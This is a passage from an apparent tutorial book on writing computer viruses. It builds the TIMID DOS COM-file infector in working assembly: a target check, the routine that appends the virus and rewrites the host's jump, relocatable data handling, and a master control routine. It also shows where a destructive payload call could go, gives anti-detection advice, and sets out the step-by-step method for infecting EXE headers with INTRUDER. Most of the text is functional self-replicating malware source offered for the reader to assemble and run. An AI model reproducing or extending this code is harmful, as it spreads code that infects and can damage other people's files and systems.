call START_IMAGE). DOS stores an internal file pointer for each

open file which keeps track of where in the file DOS is going to do

its reading and writing from. The file pointer is just a four byte long

integer, which specifies which byte in the selected file a read or

write operation refers to. This file pointer starts out pointing to the

first byte in the file (file pointer = 0), and it is automatically

advanced by DOS as the file is read from or written to. Since it

starts at the beginning of the file, and the FILE_OK procedure must

read the first five bytes of the file, there is no need to touch the file

pointer right now. However, you should be aware that it is there,

hidden away by DOS. It is an essential part of any file reading and

writing we may want to do. When it comes time for the virus to

infect the file, it will have to modify this file pointer to grab a few

bytes here and put them there, etc. Doing that is much faster (and

hence, less noticeable) than reading a whole file into memory,

manipulating it in memory, and then writing it back to disk. For

now, though, the actual reading of the file is fairly simple. It looks

like this:

mov bx,ax ;put handle in bx

mov cx,5 ;prepare to read 5 bytes

mov dx,OFFSET START_IMAGE ;to START_IMAGE

mov ah,3FH

int 21H ;go do it

We will not worry about the possibility of an error in

reading five bytes here. The only possible error is that the file is not

long enough to read five bytes, and we are pretty safe in assuming

that most COM files will have more than four bytes in them.

Finally, to close the file, we use DOS function 3E Hex and

put the file handle in bx. Putting it all together, the FILE_OK

procedure looks like this:

FILE_OK:
        mov     dx,OFFSET FNAME                   ;first open the file
        mov     ax,3D02H                          ;r/w access open file
        int     21H
        jc      FOK_NZEND                         ;error opening file - file can't be used
        mov     bx,ax                             ;put file handle in bx
        push    bx                                ;and save it on the stack
        mov     cx,5                              ;read 5 bytes at the start of the program
        mov     dx,OFFSET START_IMAGE             ;and store them here
        mov     ah,3FH                            ;DOS read function
        int     21H
        pop     bx                                ;restore the file handle
        mov     ah,3EH
        int     21H                               ;and close the file
        mov     ax,WORD PTR [FSIZE]               ;get the file size of the host
        add     ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add size of virus to it
        jc      FOK_NZEND                         ;c set if ax overflows (size > 64k)
        cmp     BYTE PTR [START_IMAGE],0E9H       ;size ok-is first byte a near jmp?
        jnz     FOK_ZEND                          ;not near jmp, file must be ok, exit with z
        cmp     WORD PTR [START_IMAGE+3],4956H    ;ok, is 'VI' in positions 3 & 4?
        jnz     FOK_ZEND                          ;no, file can be infected, return with Z set
FOK_NZEND:
        mov     al,1                              ;we'd better not infect this file
        or      al,al                             ;so return with z reset
        ret
FOK_ZEND:
        xor     al,al                             ;ok to infect, return with z set
        ret

This completes our discussion of the search mechanism for the

virus.

The Copy Mechanism

After the virus finds a file to infect, it must carry out the

infection process. We have already briefly discussed how that is to

be accomplished, but now let's write the code that will actually do

it. We'll put all of this code into a routine called INFECT.

The code for INFECT is quite straightforward. First the

virus opens the file whose name is stored at FNAME in read/write

mode, just as it did when searching for a file, and it stores the file

handle in a data area called HANDLE. This time, however we want

to go to the end of the file and store the virus there. To do so, we

first move the file pointer using DOS function 42H. In calling

function 42H, the register bx must be set up with the file handle

number, and cx:dx must contain a 32 bit long integer telling where

to move the file pointer to. There are three different ways this

function can be used, as specified by the contents of the al register.

If al=0, the file pointer is set relative to the beginning of the file. If

al=1, it is incremented relative to the current location, and if al=2,

cx:dx is used as the offset from the end of the file. Since the first

thing the virus must do is place its code at the end of the COM file

it is attacking, it sets the file pointer to the end of the file. This is

easy. Set cx:dx=0, al=2 and call function 42H:

xor cx,cx

mov dx,cx

mov bx,WORD PTR [HANDLE]

mov ax,4202H

int 21H
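The three modes of function 42H have direct counterparts in most high-level languages, which can make the behavior of the file pointer easier to picture. As a sketch only, the Python fragment below uses an in-memory file (so nothing on disk is touched) and the standard os.SEEK_SET, os.SEEK_CUR and os.SEEK_END constants, whose values happen to be the same 0, 1 and 2 passed in al. The ten-byte sample data is made up for the demonstration.

```python
import io
import os

f = io.BytesIO(b"0123456789")        # a ten-byte stand-in for a file

# Mode 2: offset measured from the end. Offset 0 gives the file length.
end_pos = f.seek(0, os.SEEK_END)

# Mode 0: offset measured from the beginning of the file.
start_pos = f.seek(0, os.SEEK_SET)

# Reading advances the pointer automatically, just as DOS does.
first_five = f.read(5)
after_read = f.tell()

# Mode 1: offset measured from the current position.
moved_pos = f.seek(2, os.SEEK_CUR)

print(end_pos, start_pos, first_five, after_read, moved_pos)
```

Seeking to offset zero from the end is also a cheap way to learn a file's length, since the call reports the new position.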

With the file pointer in the right location, the virus can now

write itself out to disk at the end of this file. To do so, one simply

uses the DOS write function, 40 Hex. To use function 40H one must

set ds:dx to the location in memory where the data is stored that is

going to be written to disk. In this case that is the start of the virus.

Next, set cx to the number of bytes to write and bx to the file handle.

There is one problem here. Since the virus is going to be

attaching itself to COM files of all different sizes, the address of

the start of the virus code is not at some fixed location in memory.

Every file it is attached to will put it somewhere else in memory.

So the virus has to be smart enough to figure out where it is. To do

this we will employ a trick in the main control routine, and store

the offset of the viral code in a memory location named

VIR_START. Here we assume that this memory location has already

been properly initialized. Then the code to write the virus to

the end of the file it is attacking will simply look like this:

mov cx,OFFSET FINAL - OFFSET VIRUS

mov bx,WORD PTR [HANDLE]

mov dx,WORD PTR [VIR_START]

mov ah,40H

int 21H

where VIRUS is a label identifying the start of the viral code and

FINAL is a label identifying the end of the code. OFFSET FINAL -

OFFSET VIRUS is independent of the location of the virus in

memory.

Now, with the main body of viral code appended to the end

of the COM file under attack, the virus must do some cleanup

work. First, it must move the first five bytes of the COM file to a

storage area in the viral code. Then it must put a jump instruction

plus the code letters ``VI'' at the start of the COM file. Since we have

already read the first five bytes of the COM file in the search

routine, they are sitting ready and waiting for action at START_IMAGE.

We need only write them out to disk in the proper location.

Note that there must be two separate areas in the virus to store five

bytes of startup code. The active virus must have the data area

START_IMAGE to store data from files it wants to infect, but it

must also have another area, which we'll call START_CODE. This

contains the first five bytes of the file it is actually attached to.

Without START_CODE, the active virus will not be able to transfer

control to the host program it is attached to when it is done

executing.

Figure 8: START_IMAGE and START_CODE. (In memory: Host 1 with the active virus, which holds both START_CODE and START_IMAGE. On disk: Host 2 with the new copy of the virus and its START_CODE.)

To write the first five bytes of the file under attack, the virus
must take the five bytes at START_IMAGE, and store them where
START_CODE is located on disk. First, the virus sets the file
pointer to the location of START_CODE on disk. To find that
location, one must take the original file size (stored at FSIZE by
the search routine), and add OFFSET START_CODE - OFFSET
VIRUS to it, moving the file pointer with respect to the beginning
of the file:

xor cx,cx

mov dx,WORD PTR [FSIZE]

add dx,OFFSET START_CODE - OFFSET VIRUS

mov bx,WORD PTR [HANDLE]

mov ax,4200H

int 21H

Next, the virus writes the five bytes at START_IMAGE out to the

file:

mov cx,5

mov bx,WORD PTR [HANDLE]

mov dx,OFFSET START_IMAGE

mov ah,40H

int 21H

The final step in infecting a file is to set up the first five

bytes of the file with a jump to the beginning of the virus code,

along with the identification letters ``VI''. To do this, first position

the file pointer to the beginning of the file:

xor cx,cx

mov dx,cx

mov bx,WORD PTR [HANDLE]

mov ax,4200H

int 21H

Next, we must set up a data area in memory with the correct

information to write to the beginning of the file. START_IMAGE

is a good place to set up these bytes since the data there is no longer

needed for anything. The first byte should be a near jump instruction,

E9 Hex:

mov BYTE PTR [START_IMAGE],0E9H

The next two bytes should be a word to tell the CPU how
many bytes to jump forward. This word needs to be the original file
size of the host program, plus the number of bytes in the virus which
are before the start of the executable code (we will put some data
there). We must also subtract 3 from this number because the
relative jump is always referenced to the current instruction pointer,
which will be pointing to 103H when the jump is actually executed.
Thus, the two bytes telling the program where to jump are set up
by

mov ax,WORD PTR [FSIZE]

add ax,OFFSET VIRUS_START - OFFSET VIRUS - 3

mov WORD PTR [START_IMAGE+1],ax
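The subtraction of 3 is easy to get wrong, so it is worth checking against a known case. The sketch below, in Python, encodes and decodes a three-byte near jump located at offset 100H, using the jmp 154AH from the Figure 4 example. The function names are hypothetical. The displacement is stored low byte first and is measured from the byte following the jump.

```python
def encode_near_jmp(target, at=0x100):
    """Return the 3 bytes of a near jump placed at `at` that lands on `target`."""
    rel = (target - (at + 3)) & 0xFFFF      # measured from the next instruction
    return bytes([0xE9]) + rel.to_bytes(2, "little")


def decode_near_jmp(code, at=0x100):
    """Return the offset a 3-byte near jump at `at` transfers control to."""
    if code[0] != 0xE9:
        raise ValueError("not a near jump")
    rel = int.from_bytes(code[1:3], "little")
    return (at + 3 + rel) & 0xFFFF          # offsets wrap within the segment


jump = encode_near_jmp(0x154A)
print(jump.hex(" "))                        # the three bytes, in file order
print(hex(decode_near_jmp(jump)))
```

Here the displacement works out to 154AH - 103H = 1447H, so the file would begin with the bytes E9 47 14. Decoding such bytes is also how one finds where a jump at the start of a suspect COM file leads.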

Finally set up the ID bytes 'VI' in our five byte data area,

mov WORD PTR [START_IMAGE+3],4956H ;'VI'

write the data to the start of the file, using the DOS write function,

mov cx,5

mov dx,OFFSET START_IMAGE

mov bx,WORD PTR [HANDLE]

mov ah,40H

int 21H

and then close the file using DOS,

mov ah,3EH

mov bx,WORD PTR [HANDLE]

int 21H

This completes the copy mechanism.

Data Storage for the Virus

One problem we must face in creating this virus is how to

locate data. Since all jumps and calls in a COM file are relative, we

needn't do anything fancy to account for the fact that the virus must

relocate itself as it copies itself from program to program. The

jumps and calls relocate themselves automatically. Handling the

data is not as easy. A data reference like

mov bx,WORD PTR [HANDLE]

refers to an absolute offset in the program segment labeled HANDLE.

We cannot just define a word in memory using an assembler

directive like

HANDLE DW 0

and then assemble the virus and run it. If we do that, it will work

right the first time. Once it has attached itself to a new program,

though, all the memory addresses will have changed, and the virus

will be in big trouble. It will either bomb out itself, or cause its host

program to bomb.

There are two ways to avoid catastrophe here. Firstly, one

could put all of the data together in one place, and write the program

to dynamically determine where the data is and store that value in

a register (e.g. si) to access it dynamically, like this:

mov bx,[si+HANDLE_OFS]

where HANDLE_OFS is the offset of the variable HANDLE from

the start of the data area.

Alternatively, we could put all of the data in a fixed location
in the code segment, provided we're sure that neither the virus nor
the host will ever occupy that space. The only safe place to do this
is at the very end of the segment, where the stack resides. Since the
virus takes control of the CPU first when the COM file is executed,
it will control the stack also. Thus we can determine exactly what
the stack is doing, and stay out of its way. This is the method we
choose.

Figure 9: Absolute data address catastrophe. (Relative code, absolute data: in the initial host of 10 Kb, the virus code and HANDLE sit directly after the host; after infection of a new host of 12 Kb, the virus code and HANDLE sit at a different offset.)

When the virus first gains control, the stack pointer, sp, is
normally set to FFFE Hex. If it calls a subroutine, the address directly
after the call is placed on the stack, in the bytes FFFD Hex and FFFC
Hex in the program's segment, and the stack pointer is decremented
by two, to FFFC Hex. When the CPU executes the return instruction
in the subroutine, it uses the two bytes stored by the call to
determine where to return to, and increments the stack pointer by
two. Likewise, executing a push instruction decrements the stack
pointer by two bytes and stores the desired register at the location
of the stack pointer. The pop instruction reverses this process. The int
instruction requires six bytes of stack space (for the flags, cs and ip),
and this includes calls to hardware interrupt handlers, which may be
accessed at any time in the program without warning, one on top of
the other.

The data area for the virus can be located just below the

memory required for the stack. The exact amount of stack space

required is rather difficult to determine, but 80 bytes will be more

than sufficient. The data will go right below these 80 bytes, and in

this manner its location may be fixed. One must simply take account

of the space it takes up when determining the maximum size of a

COM file in the FILE_OK routine.

Of course, one cannot put initialized variables on the stack.

They must be stored with the program on disk. To store them near

the end of the program segment would require the virus to expand

the file size of every file to near the 64K limit. Such a drastic change

in file sizes would quickly tip the user off that his system has been

infected! Instead, initialized variables should be stored with the

executable virus code. This strategy will keep the number of bytes

which must be added to the host to a minimum. (Thus it is a

worthwhile anti-detection measure.) The drawback is that such

variables must then be located dynamically by the virus at run time.

Fortunately, we have only one piece of data which must be

pre-initialized, the string used by DOS in the search routine to

locate COM files, which we called simply ``COMFILE''. If you take

a look back to the search routine, you'll notice that we already took

the relocatability of this piece of data into account when we

retrieved it using the instructions

mov dx,WORD PTR [VIR_START]

add dx,OFFSET COMFILE - OFFSET VIRUS

instead of simply

mov dx,OFFSET COMFILE

The Master Control Routine

Now we have all the tools to write the TIMID virus. All

that is necessary is a master control routine to pull everything

together. This master routine must:

1) Dynamically determine the location (offset) of the

virus in memory.

2) Call the search routine to find a new program to infect.

3) Infect the program located by the search routine, if it

found one.

4) Return control to the host program.

To determine the location of the virus in memory, we use

a simple trick. The first instruction in the master control routine

will look like this:

VIRUS:

COMFILE DB '*.COM',0

VIRUS_START:

call GET_START

GET_START:

sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS

The call pushes the absolute address of GET_START onto the stack

at FFFC Hex (since this is the first instruction of the virus, and the

first instruction to use the stack). At that location, we overlay the

stack with a word variable called VIR_START. We then subtract

the difference in offsets between GET_START and the first byte of

the virus, labeled VIRUS. This simple programming trick gets the

absolute offset of the first byte of the virus in the program segment,

and stores it in an easily accessible variable.
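The arithmetic behind this trick is easy to verify on paper. The sketch below only redoes the subtraction in Python. The two assemble-time offsets are hypothetical values chosen for the illustration (the six bytes of '*.COM',0 followed by a three-byte near call put GET_START nine bytes past VIRUS), as is the function name.

```python
def start_of_code(return_address, get_start_ofs, virus_ofs):
    """Offset of the label VIRUS at run time, given the word pushed by the call."""
    return (return_address - (get_start_ofs - virus_ofs)) & 0xFFFF


# Hypothetical offsets as the assembler saw them in the original listing.
VIRUS_OFS = 0x0108
GET_START_OFS = 0x0111

# If the same code later runs 0x2E00 bytes higher in the segment, the call
# pushes a correspondingly higher return address.
pushed = GET_START_OFS + 0x2E00
located = start_of_code(pushed, GET_START_OFS, VIRUS_OFS)
print(f"{located:04X}")
```

Because only the difference between the two labels enters the calculation, the result does not depend on where the assembler originally placed the code.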

Next comes an important anti-detection step: The master

control routine moves the Disk Transfer Area (DTA) to the data area

for the virus using DOS function 1A Hex,

mov dx,OFFSET DTA

mov ah,1AH

int 21H

This move is necessary because the search routine will modify data

in the DTA. When a COM file starts up, the DTA is set to a default

value of an offset of 80H in the program segment. The problem is

that if the host program requires command line parameters, they

are stored for the program at this same location. If the DTA were

not changed temporarily while the virus was executing, the search

routine would overwrite any command line parameters before the

host program had a chance to access them. That would cause any

infected COM program which required a command line parameter

to bomb. The virus would execute just fine, and host programs that

required no parameters would run fine, but the user could spot

trouble with some programs. Temporarily moving the DTA eliminates

this problem.

With the DTA moved, the main control routine can safely

call the search and copy routines:

call FIND_FILE ;try to find a file to infect

jnz EXIT_VIRUS ;jump if no file was found

call INFECT ;else infect the file

EXIT_VIRUS:

Finally, the master control routine must return control to the host

program. This involves three steps: Firstly, restore the DTA to its

initial value, offset 80H,

mov dx,80H

mov ah,1AH

int 21H

Next, move the first five bytes of the original host program from

the data area START_CODE where they are stored to the start of

the host program at 100H.

Finally, the virus must transfer control to the host program

at 100H. This requires a trick, since one cannot simply say ``jmp

100H'' because such a jump is relative, so that instruction won't be

jumping to 100H as soon as the virus moves to another file, and that

spells disaster. One instruction which does transfer control to an

absolute offset is the return from a call. Since we did a call right at

the start of the master control routine, and we haven't executed the

corresponding return yet, executing the ret instruction will both

transfer control to the host and clear the stack. Of course,

the return address must be set to 100H to transfer control to the

host, and not somewhere else. That return address is just the word

at VIR_START. So, to transfer control to the host, we write

mov WORD PTR [VIR_START],100H

ret

Bingo, the host program takes over and runs as if the virus had never

been there.

As written, this master control routine is a little dangerous,

because it will make the virus completely invisible to the user when

he runs a program... so it could get away. It seems wise to tame the

beast a bit when we are just starting. So, after the call to INFECT,

let's just put a few extra lines in to display the name of the file which

the virus just infected:

call INFECT

mov dx,OFFSET FNAME ;dx points to FNAME

mov WORD PTR [HANDLE],24H ;'$' string terminator

mov ah,9 ;DOS string write fctn

int 21H

EXIT_VIRUS:

This uses DOS function 9 to print the string at FNAME, which is

the name of the file that was infected. Note that if someone wanted

to make a malicious monster out of this virus, the destructive code

could easily be put here, or after EXIT_VIRUS, depending on the

conditions under which destructive activity was desired. For example,

our hacker could write a routine called DESTROY, which

would wreak all kinds of havoc, and then code it in like this:

call INFECT

call DESTROY

EXIT_VIRUS:

if one wanted to do damage only after a successful infection took

place, or like this:

call INFECT

EXIT_VIRUS:

call DESTROY

if one wanted the damage to always take place, no matter what, or

like this:

call FIND_FILE

jnz DESTROY

call INFECT

EXIT_VIRUS:

if one wanted damage to occur only in the event that the virus could

not find a file to infect, etc., etc. I say this not to suggest that you

write such a routine---please don't---but just to show you how easy

it would be to control destructive behavior in a virus (or any other

program, for that matter).

The First Host

To compile and run the virus, it must be attached to a host

program. It cannot exist by itself. In writing the assembly language

code for this virus, we have to set everything up so the virus thinks

it's already attached to some COM file. All that is needed is a simple

program that does nothing but exit to DOS. To return control to

DOS, a program executes DOS function 4C Hex. That just stops

the program from running, and DOS takes over. When function 4C

is executed, a return code is put in al by the program making the

call, where al=0 indicates successful completion of the program.

Any other value indicates some kind of error, as determined by the

program making the DOS call. So, the simplest COM program

would look like this:

mov ax,4C00H

int 21H

Since the virus will take over the first five bytes of a COM

file, and since you probably don't know how many bytes the above

two instructions will take up, let's put five NOP (no operation)

instructions at the start of the host program. These take up five bytes

which do nothing. Thus, the host program will look like this:

HOST:

nop

nop

nop

nop

nop

mov ax,4C00H

int 21H

We don't want to code it like that though! We code it to

look just like it would if the virus had infected it. Namely, the NOP's

will be stored at START_CODE,

START_CODE:

nop

nop

nop

nop

nop

and the first five bytes of the host will consist of a jump to the virus

and the letters ``VI'':

HOST:

jmp NEAR VIRUS_START

db 'VI'

mov ax,4C00H

int 21H

There, that's it. The TIMID virus is listed in its entirety in Appendix

A, along with everything you need to compile it correctly.

I realize that you might be overwhelmed with new ideas

and technical details at this point, and for me to call this virus

``simple'' might be discouraging. If so, don't lose heart. Study it

carefully. Go back over the text and piece together the various

functional elements, one by one. And if you feel confident, you

might try putting it in a subdirectory of its own on your machine

and giving it a whirl. If you do though, be careful! Proceed at your

own risk! It's not like any other computer program you've ever run!

Case Number Two:

A Sophisticated Executable Virus

The simple COM file infector which we just developed

might be good instruction on the basics of how to write a virus, but

it is severely limited. Since it only attacks COM files in the current

directory, it will have a hard time proliferating. In this chapter, we

will develop a more sophisticated virus that will overcome these

limitations. . . . a virus that can infect EXE files and jump directory

to directory and drive to drive. Such improvements make the virus

much more complex, and also much more dangerous. We started

with something simple and relatively innocuous in the last chapter.

You can't get into too much trouble with it. However, I don't want

to leave you with only children's toys. The virus we discuss in this

chapter, named INTRUDER, is no toy. It is very capable of finding

its way into computers all around the world, and deceiving a very

capable computer whiz.

The Structure of an EXE File

An EXE file is not as simple as a COM file. The EXE file

is designed to allow DOS to execute programs that require more

than 64 kilobytes of code, data and stack. When loading an EXE

file, DOS makes no a priori assumptions about the size of the file,

or what is code or data. All of this information is stored in the EXE

file itself, in the EXE Header at the beginning of the file. This

header has two parts to it, a fixed-length portion, and a variable-length

table of pointers to segment references in the Load Module,

called the Relocation Pointer Table. Since any virus which attacks

EXE files must be able to manipulate the data in the EXE Header,

we'd better take some time to look at it. Figure 10 is a graphical

representation of an EXE file. The meaning of each byte in the

header is explained in Table 1.
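For readers who want to inspect a header themselves, the fixed-length portion described in Table 1 can be unpacked in a few lines. What follows is a minimal sketch, not a complete EXE parser: the field names are our own renderings of the names in Table 1, the sample header is synthetic, and page_fields assumes the usual convention that Page Count includes a partially filled last page.

```python
import struct
from collections import namedtuple

# Field names follow Table 1; the spellings are chosen for this sketch.
ExeHeader = namedtuple("ExeHeader", [
    "signature", "last_page_size", "page_count", "reloc_entries",
    "header_paragraphs", "minalloc", "maxalloc", "initial_ss",
    "initial_sp", "checksum", "initial_ip", "initial_cs",
    "reloc_table_offset", "overlay_number",
])

# Two signature bytes followed by thirteen little-endian words (28 bytes).
HEADER_FORMAT = "<2s13H"


def parse_exe_header(data):
    """Unpack the fixed-length part of an EXE header from raw bytes."""
    size = struct.calcsize(HEADER_FORMAT)
    if len(data) < size:
        raise ValueError("file too short to hold an EXE header")
    header = ExeHeader._make(struct.unpack(HEADER_FORMAT, data[:size]))
    if header.signature != b"MZ":
        raise ValueError("signature is not MZ")
    return header


def page_fields(file_size):
    """Return (Page Count, Last Page Size) for a file of file_size bytes."""
    full_pages, remainder = divmod(file_size, 512)
    if remainder:
        return full_pages + 1, remainder
    return full_pages, 0


# A synthetic header, built only to exercise the parser.
sample = struct.pack(HEADER_FORMAT, b"MZ", 2, 5, 1, 2, 0, 0xFFFF,
                     0x0700, 0x0100, 0, 0, 0, 0x1C, 0)
header = parse_exe_header(sample)
print(header.page_count, header.last_page_size, page_fields(2050))
```

Reading a real file is a matter of passing the first 28 bytes of the file to parse_exe_header.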

[Figure 10: The layout of an EXE file, showing the EXE File Header, the Relocation Pointer Table and the EXE Load Module.]

Table 1: Structure of the EXE Header.

Offset  Size  Name                   Description
------  ----  ---------------------  ------------------------------------------
0       2     Signature              These bytes are the characters M and Z in
                                     every EXE file and identify the file as an
                                     EXE file. If they are anything else, DOS
                                     will try to treat the file as a COM file.
2       2     Last Page Size         Actual number of bytes in the final 512
                                     byte page of the file (see Page Count).
4       2     Page Count             The number of 512 byte pages in the file.
                                     The last page may only be partially
                                     filled, with the number of valid bytes
                                     specified in Last Page Size. For example,
                                     a file of 2050 bytes would have Page
                                     Count = 5 and Last Page Size = 2.
6       2     Reloc Table Entries    The number of entries in the relocation
                                     pointer table.
8       2     Header Paragraphs      The size of the EXE file header in 16 byte
                                     paragraphs, including the Relocation
                                     table. The header is always a multiple of
                                     16 bytes in length.
0AH     2     MINALLOC               The minimum number of 16 byte paragraphs
                                     of memory that the program requires to
                                     execute. This is in addition to the image
                                     of the program stored in the file. If
                                     enough memory is not available, DOS will
                                     return an error when it tries to load the
                                     program.
0CH     2     MAXALLOC               The maximum number of 16 byte paragraphs
                                     to allocate to the program when it is
                                     executed. This is normally set to FFFF
                                     Hex, except for TSR's.
0EH     2     Initial ss             This contains the initial value of the
                                     stack segment relative to the start of the
                                     code in the EXE file, when the file is
                                     loaded. This is modified dynamically by
                                     DOS when the file is loaded, to reflect
                                     the proper value to store in the ss
                                     register.
10H     2     Initial sp             The initial value to set sp to when the
                                     program is executed.
12H     2     Checksum               A word oriented checksum value such that
                                     the sum of all words in the file is FFFF
                                     Hex. If the file is an odd number of bytes
                                     long, the last byte is treated as a word
                                     with the high byte = 0. Often this
                                     checksum is used for nothing, and some
                                     compilers do not even bother to set it
                                     properly. The INTRUDER virus will not
                                     alter the checksum.
14H     2     Initial ip             The initial value for the instruction
                                     pointer, ip, when the program is loaded.
16H     2     Initial cs             Initial value of the code segment relative
                                     to the start of the code in the EXE file.
                                     This is modified by DOS at load time.
18H     2     Relocation Tbl Offset  Offset of the start of the relocation
                                     table from the start of the file, in
                                     bytes.
1AH     2     Overlay Number         The resident, primary part of a program
                                     always has this word set to zero. Overlays
                                     will have different values stored here.

When DOS loads the EXE, it uses the Relocation Pointer

Table to modify all segment references in the Load Module. After

that, the segment references in the image of the program loaded

into memory point to the correct memory location. Let's consider

an example (Figure 11): Imagine an EXE file with two segments.

The segment at the start of the load module contains a far call to

the second segment. In the load module, this call looks like this:

Address      Assembly Language      Machine Code

0000:0150    CALL FAR 0620:0980     9A 80 09 20 06

From this, one can infer that the start of the second segment is

6200H (= 620H x 10H) bytes from the start of the load module. The

Relocation Pointer Table would contain a vector 0000:0153 to point

to the segment reference (20 06) of this far call. When DOS loads

the program, it might load it starting at segment 2130H, because

DOS and some memory resident programs occupy locations below

this. So DOS would first load the Load Module into memory at

2130:0000. Then it would take the relocation pointer 0000:0153

and transform it into a pointer, 2130:0153 which points to the

segment in the far call in memory. DOS will then add 2130H to the

word in that location, resulting in the machine language code 9A

80 09 50 27, or CALL FAR 2750:0980 (See Figure 11).

[Figure 11: An example of relocating code. On disk, the load module holds CALL FAR 0620:0980 at 0000:0150 and the relocation pointer table holds the entry 0000:0153. In RAM, with the load module placed at 2130:0000 above DOS and the PSP, the instruction at 2130:0150 reads CALL FAR 2750:0980, and Routine X lies at 2750:0980.]
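The relocation step in this example can be reproduced in a few lines. The sketch below is an illustration of the arithmetic only, not of how DOS itself is written: it treats the load module as a byte array, takes each relocation pointer as a (segment, offset) pair relative to the start of the load module, and adds the load segment to the word found there. The function name and the 160H-byte dummy module are assumptions made for the demonstration.

```python
import struct


def apply_relocations(load_module, reloc_pointers, load_segment):
    """Return a copy of load_module with each segment reference fixed up."""
    image = bytearray(load_module)
    for segment, offset in reloc_pointers:
        # Position of the segment word, relative to the start of the module.
        position = segment * 16 + offset
        value, = struct.unpack_from("<H", image, position)
        # Segment values are 16 bits wide, so the sum wraps at 64K.
        struct.pack_into("<H", image, position, (value + load_segment) & 0xFFFF)
    return image


# Dummy load module containing only the far call from the example.
module = bytearray(0x160)
module[0x150:0x155] = bytes([0x9A, 0x80, 0x09, 0x20, 0x06])

image = apply_relocations(module, [(0x0000, 0x0153)], 0x2130)
print(image[0x150:0x155].hex(" ").upper())
```

Only the two segment bytes change; the opcode and the offset 0980 are left exactly as they were on disk.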

Note that a COM program requires none of these calisthenics

since it contains no segment references. Thus, DOS just has to

set the segment registers all to one value before passing control to

the program.

Infecting an EXE File

A virus that is going to infect an EXE file will have to

modify the EXE Header and the Relocation Pointer Table, as well

as adding its own code to the Load Module. This can be done in a

whole variety of ways, some of which require more work than

others. The INTRUDER virus will attach itself to the end of an EXE

program and gain control when the program first starts. This will

require a routine similar to that in TIMID, which copies program

code from memory to a file on disk, and then adjusts the file.

INTRUDER will have its very own code, data and stack

segments. A universal EXE virus cannot make any assumptions

about how those segments are set up by the host program. It would

crash as soon as it finds a program where those assumptions are

violated. For example, if one were to use whatever stack the host

program was initialized with, the stack could end up right in the

middle of the virus code with the right host. (That memory would

have been free space before the virus had infected the program.) As

soon as the virus started making calls or pushing data onto the stack,

it would corrupt its own code and self-destruct.

To set up segments for the virus, new initial segment values

for cs and ss must be placed in the EXE file header. Also, the old

initial segments must be stored somewhere in the virus, so it can

pass control back to the host program when it is finished executing.

We will have to put two pointers to these segment references in the

relocation pointer table, since they are relocatable references inside

the virus code segment.

Adding pointers to the relocation pointer table brings up

an important question. To add pointers to the relocation pointer

table, it may sometimes be necessary to expand that table's size.

Since the EXE Header must be a multiple of 16 bytes in size,

relocation pointers are allocated in blocks of four four-byte pointers.

Thus, if we can keep the number of segment references down to

two, it will be necessary to expand the header only every other time.

Alternatively, the virus may choose not to infect the file, rather

than expanding the header. There are pros and cons for both

possibilities. On the one hand, a load module can be hundreds of

kilobytes long, and moving it is a time-consuming chore that can

make it very obvious that something is going on that shouldn't be.

On the other hand, if the virus chooses not to move the load module,

then roughly half of all EXE files will be naturally immune to

infection. The INTRUDER virus will take the quiet and cautious

approach that does not infect every EXE. You might want to try the

other approach as an exercise, and move the load module only when

necessary, and only for relatively small files (pick a maximum size).

Suppose the main virus routine looks something like this:

VSEG SEGMENT

VIRUS:

mov ax,cs ;set ds=cs for virus

mov ds,ax

.

.

.

mov ax,SEG HOST_STACK ;restore host stack

cli

mov ss,ax

mov sp,OFFSET HOST_STACK

sti

jmp FAR PTR HOST ;go execute host

Then, to infect a new file, the copy routine must perform the

following steps:

1. Read the EXE Header in the host program.

2. Extend the size of the load module until it is an even

multiple of 16 bytes, so cs:0000 will be the first byte

of the virus.

3. Write the virus code currently executing to the end of

the EXE file being attacked.

4. Write the initial values of ss:sp, as stored in the EXE

Header, to the locations of SEG HOST_STACK and

OFFSET HOST_STACK on disk in the above code.

5. Write the initial value of cs:ip in the EXE Header to

the location of FAR PTR HOST on disk in the above

code.

6. Store Initial ss=SEG VSTACK, Initial sp=OFFSET

VSTACK, Initial cs=SEG VSEG, and Initial

ip=OFFSET VIRUS in the EXE header in place of the

old values.

7. Add two to the Relocation Table Entries in the EXE

header.

8. Add two relocation pointers at the end of the Reloca

tion Pointer Table in the EXE file on disk (the location

of these pointers is calculated from the header). The

first pointer must point to SEG HOST_STACK in the

instruction

mov ax,SEG HOST_STACK

The second should point to the segment part of the

jmp FAR PTR HOST

instruction in the main virus routine.

9. Recalculate the size of the infected EXE file, and

adjust the header fields Page Count and Last Page

Size accordingly.

10. Write the new EXE Header back out to disk.

All the initial segment values must be calculated from the size of

the load module which is being infected. The code to accomplish

this infection is in the routine INFECT in Appendix B.

A Persistent File Search Mechanism

As in the TIMID virus, the search mechanism can be

broken down into two parts: FIND_FILE simply locates possible

files to infect. FILE_OK determines whether a file can be infected.

The FILE_OK procedure will be almost the same as the

one in TIMID. It must open the file in question and determine

whether it can be infected and make sure it has not already been

infected. The only two criteria for determining whether an EXE file

can be infected are whether the Overlay Number is zero, and

whether it has enough room in its relocation pointer table for two

more pointers. The latter requirement is determined by a simple

calculation from values stored in the EXE header. If

16*Header Paragraphs - 4*Relocation Table Entries - Relocation Table Offset

is greater than or equal to 8 (=4 times the number of relocatables

the virus requires), then there is enough room in the relocation

pointer table. This calculation is performed by the subroutine

REL_ROOM, which is called by FILE_OK.
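The quantity in question is simply the unused space between the end of the relocation pointer table and the end of the header. As a worked check of the arithmetic, here is the same calculation in Python. This is a sketch for examining header values by hand, not the REL_ROOM routine itself; the function names and the sample numbers are made up for the illustration.

```python
def relocation_room(header_paragraphs, reloc_entries, reloc_table_offset):
    """Unused bytes left in the header after the last relocation pointer."""
    header_bytes = 16 * header_paragraphs
    table_bytes = 4 * reloc_entries
    return header_bytes - table_bytes - reloc_table_offset


def has_room(header_paragraphs, reloc_entries, reloc_table_offset, pointers=2):
    """True if `pointers` more four-byte entries fit without growing the header."""
    room = relocation_room(header_paragraphs, reloc_entries, reloc_table_offset)
    return room >= 4 * pointers


# A 32-byte header whose table starts at 1CH and already holds one entry
# is completely full.
print(relocation_room(2, 1, 0x1C), has_room(2, 1, 0x1C))
# A 48-byte header with the same table has sixteen bytes to spare.
print(relocation_room(3, 1, 0x1C), has_room(3, 1, 0x1C))
```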

To determine whether the virus has already infected a file,

we put an ID word with a preassigned value in the code segment

at a fixed offset (say 0). Then, when checking the file, FILE_OK

gets the segment from the Initial cs in the EXE header. It uses that

with the offset 0 to find the ID word in the load module (provided

the virus is there). If the virus has not already infected the file,

Initial cs will contain the initial code segment of the host program.

Then our calculation will fetch some random word out of the file

